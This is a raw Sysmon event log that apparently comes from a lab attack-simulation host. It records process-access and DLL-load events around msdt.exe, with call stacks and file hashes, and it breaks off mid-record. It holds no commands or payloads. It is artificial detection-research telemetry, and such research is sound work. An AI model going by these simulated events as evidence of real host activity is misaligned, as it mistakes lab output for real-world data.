13:06:05.966{326FD73D-A441-6294-EB00-000000005502}48004500C:\Windows\Explorer.EXE{326FD73D-C13D-6294-460B-000000005502}6584C:\WINDOWS\system32\msdt.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+e9b5f|C:\Windows\System32\SHELL32.dll+ebd30|C:\Windows\System32\TwinUI.dll+100021|C:\Windows\System32\TwinUI.dll+10088f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000100420Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:05.966{326FD73D-A441-6294-EB00-000000005502}48004500C:\Windows\Explorer.EXE{326FD73D-C13D-6294-460B-000000005502}6584C:\WINDOWS\system32\msdt.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+81330|C:\Windows\System32\SHELL32.dll+ebcec|C:\Windows\System32\TwinUI.dll+100021|C:\Windows\System32\TwinUI.dll+10088f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000100419Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:05.966{326FD73D-A441-6294-EB00-000000005502}48004500C:\Windows\Explorer.EXE{326FD73D-C13D-6294-460B-000000005502}6584C:\WINDOWS\system32\msdt.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+e9db4|C:\Windows\System32\SHELL32.dll+ebcc0|C:\Windows\System32\TwinUI.dll+100021|C:\Windows\System32\TwinUI.dll+10088f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000100418Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:05.966{326FD73D-A441-6294-EB00-000000005502}48004500C:\Windows\Explorer.EXE{326FD73D-C13D-6294-460B-000000005502}6584C:\WINDOWS\system32\msdt.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+ffe59|C:\Windows\System32\TwinUI.dll+10088f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000100417Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:05.951{326FD73D-A253-6294-0B00-000000005502}6323688C:\Windows\system32\lsass.exe{326FD73D-C13D-6294-460B-000000005502}6584C:\WINDOWS\system32\msdt.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\lsasrv.dll+262f7|C:\Windows\system32\lsasrv.dll+2743d|C:\Windows\system32\lsasrv.dll+26175|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000100416Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:05.951{326FD73D-A253-6294-0B00-000000005502}6323688C:\Windows\system32\lsass.exe{326FD73D-C13D-6294-460B-000000005502}6584C:\WINDOWS\system32\msdt.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\RPCRT4.dll+2c06f|C:\Windows\system32\lsasrv.dll+260bd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 734700x8000000000000000100415Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:05.951{326FD73D-C13D-6294-460B-000000005502}6584C:\Windows\System32\msdt.exeC:\Windows\System32\xmllite.dll10.0.14393.3143 (rs1_release.190725-1725)Microsoft XmlLite LibraryMicrosoft® Windows® Operating SystemMicrosoft CorporationXmlLite.dllMD5=64E301CCFADF34810ADA8DE9DBC7720F,SHA256=6EAE1E0E610793C7DF2B27795553F377D2C4126CF74D8EE4A84DE3C3150871F8,IMPHASH=B53F82B33CA6ABD6251152A46E5FF78CtrueMicrosoft WindowsValid 734700x8000000000000000100414Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:05.951{326FD73D-C13D-6294-460B-000000005502}6584C:\Windows\System32\msdt.exeC:\Windows\System32\oleacc.dll7.2.14393.4169 (rs1_release.210107-1130)Active Accessibility Core ComponentMicrosoft® Windows® Operating SystemMicrosoft CorporationOLEACC.DLLMD5=1B04659F0A22BFE9142B6AD36467ACEA,SHA256=67BC7C19D71FB98A7B5882B0F2BFC8F2E4491B4ACBE23EE545D54FFCAEC808E9,IMPHASH=427F18493D540CBF4092BD07A97BE51FtrueMicrosoft WindowsValid 734700x8000000000000000100413Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:05.935{326FD73D-C13D-6294-460B-000000005502}6584C:\Windows\System32\msdt.exeC:\Windows\System32\atlthunk.dll10.0.14393.2969 (rs1_release.190503-1820)atlthunk.dllMicrosoft® Windows® Operating SystemMicrosoft Corporationatlthunk.dllMD5=BECA5E9FA540246333036919A57B7AEF,SHA256=62C24B274B38A88C83EE122CB30142C2135953C1A26582AD003512B238CB7FC9,IMPHASH=E86BAF1A171668A11110B8975A3BDE27trueMicrosoft WindowsValid 734700x8000000000000000100412Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:05.935{326FD73D-C13D-6294-460B-000000005502}6584C:\Windows\System32\msdt.exeC:\Windows\System32\xmllite.dll10.0.14393.3143 (rs1_release.190725-1725)Microsoft XmlLite LibraryMicrosoft® Windows® Operating SystemMicrosoft CorporationXmlLite.dllMD5=64E301CCFADF34810ADA8DE9DBC7720F,SHA256=6EAE1E0E610793C7DF2B27795553F377D2C4126CF74D8EE4A84DE3C3150871F8,IMPHASH=B53F82B33CA6ABD6251152A46E5FF78CtrueMicrosoft WindowsValid 734700x8000000000000000100411Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:05.935{326FD73D-C13D-6294-460B-000000005502}6584C:\Windows\System32\msdt.exeC:\Windows\System32\dwmapi.dll10.0.14393.4169 (rs1_release.210107-1130)Microsoft Desktop Window Manager APIMicrosoft® Windows® Operating SystemMicrosoft Corporationdwmapi.dllMD5=74621C6ABE4E9A568DF0A38E7282D71E,SHA256=0788A092D47800D0EB120A7DBB9E59234D0722A4A2E80ECE6CE70E3A84A3750A,IMPHASH=ADB9F71ACD4F7D3CF761AB6C59A7F1E5trueMicrosoft WindowsValid 734700x8000000000000000100410Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:05.935{326FD73D-C13D-6294-460B-000000005502}6584C:\Windows\System32\msdt.exeC:\Windows\System32\msctf.dll10.0.14393.4530 (rs1_release.210705-0736)MSCTF Server DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationMSCTF.DLLMD5=E2374A214A9F0C8347C29EBDE3447986,SHA256=F2260FE7E0C4E92D49CF0F550E2A1B3D3F1D2D76E6F5C8F16B0E16B6117D9EE1,IMPHASH=EB898F83C3A5D6877A523BC64B41CB06trueMicrosoft WindowsValid 10341000x8000000000000000100409Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:05.935{326FD73D-A254-6294-1600-000000005502}13003216C:\Windows\system32\svchost.exe{326FD73D-C13D-6294-460B-000000005502}6584C:\WINDOWS\system32\msdt.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 734700x8000000000000000100408Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:05.935{326FD73D-C13D-6294-460B-000000005502}6584C:\Windows\System32\msdt.exeC:\Windows\System32\msftedit.dll10.0.14393.4704 (rs1_release.211004-1917)Rich Text Edit Control, v8.5Microsoft® Windows® Operating SystemMicrosoft CorporationMsftEdit.DLLMD5=76AA789092145B52D12BF1B1E8658294,SHA256=8116A9DDDA0090327E537D1C87EE3C6A1716B6228AD20F71665F0E493ACD47EF,IMPHASH=7C36F76BEB38B735155D539BEBF60532trueMicrosoft WindowsValid 10341000x8000000000000000100407Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:05.935{326FD73D-A254-6294-1600-000000005502}13001356C:\Windows\system32\svchost.exe{326FD73D-C13D-6294-460B-000000005502}6584C:\WINDOWS\system32\msdt.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000100406Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:05.935{326FD73D-A253-6294-0B00-000000005502}6323688C:\Windows\system32\lsass.exe{326FD73D-C13D-6294-460B-000000005502}6584C:\WINDOWS\system32\msdt.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 734700x8000000000000000100405Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:05.919{326FD73D-C13D-6294-460B-000000005502}6584C:\Windows\System32\msdt.exeC:\Windows\System32\imm32.dll10.0.14393.0 (rs1_release.160715-1616)Multi-User Windows IMM32 API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationimm32MD5=E1024CF2E35DD3467F52BC83F7FEDA3F,SHA256=59C87761AD509BD096C2F35257C2370FB94B95160CB63FB9E66DFD8210AB002A,IMPHASH=C852E8FD14D356C81F834E318EEAD7FAtrueMicrosoft WindowsValid 734700x8000000000000000100404Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:05.919{326FD73D-C13D-6294-460B-000000005502}6584C:\Windows\System32\msdt.exeC:\Windows\System32\sspicli.dll10.0.14393.5006 (rs1_release.220301-1704)Security Support Provider InterfaceMicrosoft® Windows® Operating SystemMicrosoft Corporationsspicli.dllMD5=F0258C58C8DC45AF9B5AAF9BA49E0C53,SHA256=8E1EAA39742CC0E97D615229E9C13C8447B8D115B4678A1F03BE3E8E20345521,IMPHASH=4B1C9487A6420C18F688F0EC5BEB6F33trueMicrosoft WindowsValid 734700x8000000000000000100403Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:05.919{326FD73D-C13D-6294-460B-000000005502}6584C:\Windows\System32\msdt.exeC:\Windows\System32\cabinet.dll5.00 (rs1_release.160715-1616)Microsoft® Cabinet File APIMicrosoft® Windows® Operating SystemMicrosoft Corporationcabinet.dllMD5=08A4A2712DB2AE10E483FB74E46B0E73,SHA256=EEB32E3E4256CC9935227ACD5BA576B75F1F6FE3C818D2127513CB22F823FECB,IMPHASH=536E202FBC448C2C3B40D60D87620951trueMicrosoft WindowsValid 734700x8000000000000000100402Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:05.919{326FD73D-C13D-6294-460B-000000005502}6584C:\Windows\System32\msdt.exeC:\Windows\System32\dui70.dll10.0.14393.4169 (rs1_release.210107-1130)Windows DirectUI EngineMicrosoft® Windows® Operating SystemMicrosoft CorporationDUI70.DLLMD5=C3DC010AC7F5880CC7BE626566FC4130,SHA256=3ED6E9D0AF769B0BFBE94DFF4CC07A94A81271133FBB60C9EB02676C92FFB87E,IMPHASH=E76D3161885DD9D13E8514AFC7BF3853trueMicrosoft WindowsValid 734700x8000000000000000100401Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:05.919{326FD73D-C13D-6294-460B-000000005502}6584C:\Windows\System32\msdt.exeC:\Windows\System32\winhttp.dll10.0.14393.5006 (rs1_release.220301-1704)Windows HTTP ServicesMicrosoft® Windows® Operating SystemMicrosoft Corporationwinhttp.dllMD5=54658E22186450946F304FE8BB408BBB,SHA256=1877859D1B72E18784982F4254C8DAE24F15186D3CA74680E7915E53D50800A1,IMPHASH=35501E61EE90F9745FCEA0F1F844350FtrueMicrosoft WindowsValid 734700x8000000000000000100400Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:05.919{326FD73D-C13D-6294-460B-000000005502}6584C:\Windows\System32\msdt.exeC:\Windows\System32\crypt32.dll10.0.14393.4946 (rs1_release.220131-0721)Crypto API32Microsoft® Windows® Operating SystemMicrosoft CorporationCRYPT32.DLLMD5=341C44C830FB5D4FA58EF6276D9D2511,SHA256=988C82047689A625BA54959D2DB401A6891B9C00CF8A262842FBA2F032519283,IMPHASH=42B269CD88D7BD841B43BB1788792A62trueMicrosoft WindowsValid 734700x8000000000000000100399Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:05.919{326FD73D-C13D-6294-460B-000000005502}6584C:\Windows\System32\msdt.exeC:\Windows\System32\msasn1.dll10.0.14393.0 (rs1_release.160715-1616)ASN.1 Runtime APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationmsasn1.dllMD5=299464D218A27B56684B715365D149FE,SHA256=2BFE4014E06552A9D4201EF9D1C605694AAF2B7B811265EFD91FC6D1C2D48242,IMPHASH=B6562243FBF394F03046E917C719260FtrueMicrosoft WindowsValid 734700x8000000000000000100398Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:05.919{326FD73D-C13D-6294-460B-000000005502}6584C:\Windows\System32\msdt.exeC:\Windows\System32\secur32.dll10.0.14393.2273 (rs1_release_1.180427-1811)Security Support Provider InterfaceMicrosoft® Windows® Operating SystemMicrosoft Corporationsecur32.dllMD5=BCF1B2F76F8A3A3E9E8F4D4322954651,SHA256=46B327CD50E728CBC22BD80F39DCEF2789AB780C77B6D285EEB90126B06EEEB5,IMPHASH=0D8FF9DE2DA5C07D680347B1A098E759trueMicrosoft WindowsValid 734700x8000000000000000100397Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:05.919{326FD73D-C13D-6294-460B-000000005502}6584C:\Windows\System32\msdt.exeC:\Windows\System32\duser.dll10.0.14393.0 (rs1_release.160715-1616)Windows DirectUser EngineMicrosoft® Windows® Operating SystemMicrosoft CorporationDUser.DLLMD5=42D5E1F8641E9DCEE0D8751F6F7A8961,SHA256=9168110EF404BF179888AF4A0F02B2817F020BFB16351778F2DDD6915C92F190,IMPHASH=9134DC493583245CFD7E3B68926C19D0trueMicrosoft WindowsValid 734700x8000000000000000100396Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:05.919{326FD73D-C13D-6294-460B-000000005502}6584C:\Windows\System32\msdt.exeC:\Windows\System32\wer.dll10.0.14393.4704 (rs1_release.211004-1917)Windows Error Reporting DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationwer.dllMD5=7E027B814172825204990B59AA353DB6,SHA256=F6F12530FE0312540C3C1310D618EE4D9005199E90E1BB9B385CA086C54E20C1,IMPHASH=D4255358570CE65AE9390E07B2795ADCtrueMicrosoft WindowsValid 734700x8000000000000000100395Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:05.919{326FD73D-C13D-6294-460B-000000005502}6584C:\Windows\System32\msdt.exeC:\Windows\System32\wintrust.dll10.0.14393.5125 (rs1_release.220429-1732)Microsoft Trust Verification APIsMicrosoft® Windows® Operating SystemMicrosoft CorporationWINTRUST.DLLMD5=55FCE44E89BDA2444619661FE50F43EE,SHA256=420CACA0D821E7E9F1D1E683E9899BC2F6D5A4AA06C8D4BB23335DD9490CC0F8,IMPHASH=8B8383FC3FA03C92F859A2AF899A52ADtrueMicrosoft WindowsValid 734700x8000000000000000100394Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:05.919{326FD73D-C13D-6294-460B-000000005502}6584C:\Windows\System32\msdt.exeC:\Windows\System32\comdlg32.dll10.0.14393.4283 (rs1_release.210303-1802)Common Dialogs DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationcomdlg32.dllMD5=0DB1A588A248E852AD781AE14333A5C6,SHA256=6F9C36C2663B90439A1AEE74855C521FCBBDB8C7B88382C9464906F1691F65F6,IMPHASH=06716A63D3E6F97CB489B0D6810B3519trueMicrosoft WindowsValid 734700x8000000000000000100393Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:05.919{326FD73D-C13D-6294-460B-000000005502}6584C:\Windows\System32\msdt.exeC:\Windows\System32\atl.dll3.05.2284ATL Module for Windows XP (Unicode)Microsoft (R) Visual C++Microsoft CorporationATL.DLLMD5=C1B73181019C1E1F28F4161B5F198B7F,SHA256=C3678504437D23910C18D3680B05B4E819A2229BDD0E1E0567186C70D814560D,IMPHASH=5500EF6AAEED0FAA2DE0F3B65E67DE20trueMicrosoft WindowsValid 734700x8000000000000000100392Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:05.919{326FD73D-C13D-6294-460B-000000005502}6584C:\Windows\System32\msdt.exeC:\Windows\System32\uxtheme.dll10.0.14393.4169 (rs1_release.210107-1130)Microsoft UxTheme LibraryMicrosoft® Windows® Operating SystemMicrosoft CorporationUxTheme.dllMD5=43AEE61AFABE70BFC876CC53D6A64E04,SHA256=8A4C893AEB075D3D9EFEC52E49CEF94471EB9F0A91BEB4C07DF38F8A48910C12,IMPHASH=67E6A4C8E164C0229E3FF1626F1894C6trueMicrosoft WindowsValid 734700x8000000000000000100391Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:05.919{326FD73D-C13D-6294-460B-000000005502}6584C:\Windows\System32\msdt.exeC:\Windows\System32\ole32.dll10.0.14393.4651 (rs1_release.210911-1554)Microsoft OLE for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationOLE32.DLLMD5=3858DC319832992A738C12330E3E579C,SHA256=DEDE14211FCAE7CB5500730B35BABFEAC1F0D207A248D8B6418D2EEF8F348716,IMPHASH=9724475F92787AFC45A3BA458C0DCDC5trueMicrosoft WindowsValid 734700x8000000000000000100390Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:05.919{326FD73D-C13D-6294-460B-000000005502}6584C:\Windows\System32\msdt.exeC:\Windows\System32\msvcp_win.dll10.0.14393.2999 (rs1_release_inmarket.190520-1518)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcp_win.dllMD5=C50C0CEFA633773AB29572E05834F1FE,SHA256=50178F23AA57B31626614C6C65DA2B6518A64FF684FFA18A0F49C4431DFCBEC5,IMPHASH=5B59892514923CABE9B70CFE22A3F59AtrueMicrosoft WindowsValid 734700x8000000000000000100389Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:05.919{326FD73D-C13D-6294-460B-000000005502}6584C:\Windows\System32\msdt.exeC:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll6.10 (rs1_release.210107-1130)User Experience Controls LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationcomctl32.DLLMD5=FD486B6FA360ABE43E02E85F3164E9BE,SHA256=733922A216EC03FC6AA405205CD2F8BB81A39180F26839588B97F310E21071B5,IMPHASH=C3F4A4DA2950075F09DD008B60FF567CtrueMicrosoft WindowsValid 734700x8000000000000000100388Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:05.919{326FD73D-C13D-6294-460B-000000005502}6584C:\Windows\System32\msdt.exeC:\Windows\System32\oleaut32.dll10.0.14393.4402 (rs1_release.210426-1725)OLEAUT32.DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationOLEAUT32.DLLMD5=57B07BF89C63FA60A810FEDE496126CA,SHA256=080632F80FA2A387E5A55C670FFE07C927D553FDDA26F7F8B4156C0C6B20E75E,IMPHASH=8987D71C85BB2C13D3D90194331F962FtrueMicrosoft WindowsValid 734700x8000000000000000100387Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:05.919{326FD73D-C13D-6294-460B-000000005502}6584C:\Windows\System32\msdt.exeC:\Windows\System32\profapi.dll10.0.14393.0 (rs1_release.160715-1616)User Profile Basic APIMicrosoft® Windows® Operating SystemMicrosoft CorporationPROFAPI.DLLMD5=0BC84513575743DA177F3DFE18D35CA7,SHA256=C40F6AA73073995E05E5379AE593A6617E8296C79A78BD7F716D95F98AE0D899,IMPHASH=9060609FCB6C4120D4517877408A4A46trueMicrosoft WindowsValid 734700x8000000000000000100386Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:05.919{326FD73D-C13D-6294-460B-000000005502}6584C:\Windows\System32\msdt.exeC:\Windows\System32\SHCore.dll10.0.14393.5066 (rs1_release.220401-1841)SHCOREMicrosoft® Windows® Operating SystemMicrosoft CorporationSHCORE.dllMD5=FC58D75DDAF44088B9101BE2418B1967,SHA256=74A0CCA04F2405A329897A6A1A3E90A0CE48E5772F85E7188C75677CD9D78160,IMPHASH=3C09BDCE2388320645D7656AE2AC744CtrueMicrosoft WindowsValid 734700x8000000000000000100385Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:05.919{326FD73D-C13D-6294-460B-000000005502}6584C:\Windows\System32\msdt.exeC:\Windows\System32\kernel.appcore.dll10.0.14393.2312 (rs1_release.180607-1919)AppModel API HostMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel.appcore.dllMD5=0AF5EF8A7FEFD4B37036B71514FC20CF,SHA256=D4F178583F6F33794D42B4DB11008494E9CD9F069C2AD2CA304DA63F9B5F659C,IMPHASH=94524C03C5380F78283785F1E05E667DtrueMicrosoft WindowsValid 734700x8000000000000000100384Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:05.919{326FD73D-C13D-6294-460B-000000005502}6584C:\Windows\System32\msdt.exeC:\Windows\System32\shlwapi.dll10.0.14393.5125 (rs1_release.220429-1732)Shell Light-weight Utility LibraryMicrosoft® Windows® Operating SystemMicrosoft CorporationSHLWAPI.DLLMD5=407E895A220DE1A60C5B555A113FE998,SHA256=FE184347784F83953457146562E0F6C87C8DA04D0288415465631325A2A98C92,IMPHASH=9F3DE8492A7F075320A36332ACC9CAAFtrueMicrosoft WindowsValid 734700x8000000000000000100383Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:05.919{326FD73D-C13D-6294-460B-000000005502}6584C:\Windows\System32\msdt.exeC:\Windows\System32\powrprof.dll10.0.14393.0 (rs1_release.160715-1616)Power Profile Helper DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationPOWRPROF.DLLMD5=C55F634054E45C0DEE47C254AE009928,SHA256=76EB0FCA87C3AD5FA1C46EB0AF88CF85E172525029E33F5DFC5645EF2EE6F575,IMPHASH=CBD4A2FD581B65B4B1934DA291FA2B86trueMicrosoft WindowsValid 734700x8000000000000000100382Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:05.919{326FD73D-C13D-6294-460B-000000005502}6584C:\Windows\System32\msdt.exeC:\Windows\System32\bcryptprimitives.dll10.0.14393.4770 (rs1_release.211101-1440)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcryptprimitives.dllMD5=54417B63FB3760BC6DBC5DB1BDA4C272,SHA256=B7A8B457B252AB949C067D5FCFEFB2AE98E9115B958D2A0FC120D7B13B3E9FAD,IMPHASH=BA5C37A1CF8C2730ED1F4DA1587496A5trueMicrosoft WindowsValid 734700x8000000000000000100381Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:05.919{326FD73D-C13D-6294-460B-000000005502}6584C:\Windows\System32\msdt.exeC:\Windows\System32\ucrtbase.dll10.0.14393.3659 (rs1_release_1.200410-1813)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationucrtbase.dllMD5=9804D130E8E7178738C2B9808091B427,SHA256=6053B7CC85846F15094475116A8C57BA89FE99FDD1978C54E8A7E2114E318FE3,IMPHASH=57ABD1FDE351971A01E912069E11B44CtrueMicrosoft WindowsValid 734700x8000000000000000100380Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:05.919{326FD73D-C13D-6294-460B-000000005502}6584C:\Windows\System32\msdt.exeC:\Windows\System32\combase.dll10.0.14393.5125 (rs1_release.220429-1732)Microsoft COM for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationCOMBASE.DLLMD5=D63E9AB9C67A611B947527D96B81B44D,SHA256=0F050418ED9A8C0F879636B1B25AF9C651966FE75B8EFAD76F2AD73BB0AD54BC,IMPHASH=0863DD72CA0C3702DB7ACD19A4D5DEB1trueMicrosoft WindowsValid 734700x8000000000000000100379Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:05.919{326FD73D-C13D-6294-460B-000000005502}6584C:\Windows\System32\msdt.exeC:\Windows\System32\windows.storage.dll10.0.14393.5125 (rs1_release.220429-1732)Microsoft WinRT Storage APIMicrosoft® Windows® Operating SystemMicrosoft CorporationWindows.Storage.dllMD5=92988D33BA5299F42B23A1A69000FE4F,SHA256=C79560448589DB04ABB617D9FCA27D4C8E229F344BDCA937322BA8C3E7DBDD53,IMPHASH=A03B8A6BEC68C432E677F3D5E1DA4FAFtrueMicrosoft WindowsValid 734700x8000000000000000100378Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:05.919{326FD73D-C13D-6294-460B-000000005502}6584C:\Windows\System32\msdt.exeC:\Windows\System32\cfgmgr32.dll10.0.14393.0 (rs1_release.160715-1616)Configuration Manager DLLMicrosoft® Windows® Operating SystemMicrosoft 